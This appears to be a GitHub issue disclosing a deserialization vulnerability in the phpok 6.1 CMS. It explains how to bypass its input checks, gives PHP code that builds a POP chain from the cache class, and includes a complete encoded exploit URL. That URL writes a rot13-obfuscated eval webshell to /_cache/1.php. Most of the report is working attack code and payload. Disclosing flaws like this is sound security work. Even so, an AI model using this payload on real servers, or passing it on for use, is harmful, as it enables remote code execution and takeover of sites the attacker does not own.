search

qinggan / phpok

这是一套极其自由的企业站程序,支持各种自定义配置,包括站点全局参数,分类扩展,项目扩展及各种模型!
https://www.phpok.com
MIT License
242 stars 9 forks source link

phpok 6.1 has a new deserialization vulnerability, and can write any files #13

Closed T4rnRookie closed 1 year ago

T4rnRookie commented 2 years ago

I noticed in framework/phpok_call.php::_format_ext_all has an unserialize and in phpok 5.4 has already fixed something just like this https://www.anquanke.com/post/id/194453#h2-5

but in /framework/phpok_call.php I noticed I found a parse_str

image

$rs we can control so we just need to use double urlencoded can bypass it but noticed this

image

alias we can use weak compared to bypass

and we can write a pop chain use rot13 bypass

<?php
class cache
{
    protected $timeout = 1800;
    protected $status = true;
    protected $prefix = 'qinggan_';
    protected $keyfile = '';
    protected $folder = 'php://filter/string.rot13/resource=./_cache/';
    protected $key_id="1";
    protected $key_list='<?cuc riny($_ERDHRFG[1]); ?>';
    protected $debug = false;
    protected $time;
    private $time_use = 0;
    private $time_tmp = 0;
    private $count = 0;

}

echo urlencode(urlencode( serialize( new cache())));

final payload:

http://127.0.0.1:8010/api.php?c=call&f=index&data={%22m_picplayer%22:%220%26type_id%3Dformat_ext_all%26x%5Bform_type%5D%3Durl%26x%5Bcontent]=O%253A5%253A%2522cache%2522%253A12%253A%257Bs%253A10%253A%2522%2500%252A%2500timeout%2522%253Bi%253A1800%253Bs%253A9%253A%2522%2500%252A%2500status%2522%253Bb%253A1%253Bs%253A9%253A%2522%2500%252A%2500prefix%2522%253Bs%253A8%253A%2522qinggan_%2522%253Bs%253A10%253A%2522%2500%252A%2500keyfile%2522%253Bs%253A0%253A%2522%2522%253Bs%253A9%253A%2522%2500%252A%2500folder%2522%253Bs%253A44%253A%2522php%253A%252F%252Ffilter%252Fstring.rot13%252Fresource%253D.%252F_cache%252F%2522%253Bs%253A9%253A%2522%2500%252A%2500key_id%2522%253Bs%253A1%253A%25221%2522%253Bs%253A11%253A%2522%2500%252A%2500key_list%2522%253Bs%253A28%253A%2522%253C%253Fcuc%2Briny%2528%2524_ERDHRFG%255B1%255D%2529%253B%2B%253F%253E%2522%253Bs%253A8%253A%2522%2500%252A%2500debug%2522%253Bb%253A0%253Bs%253A7%253A%2522%2500%252A%2500time%2522%253BN%253Bs%253A15%253A%2522%2500cache%2500time_use%2522%253Bi%253A0%253Bs%253A15%253A%2522%2500cache%2500time_tmp%2522%253Bi%253A0%253Bs%253A12%253A%2522%2500cache%2500count%2522%253Bi%253A0%253B%257D"}

and we can get a webshell in /_cache/1.php

image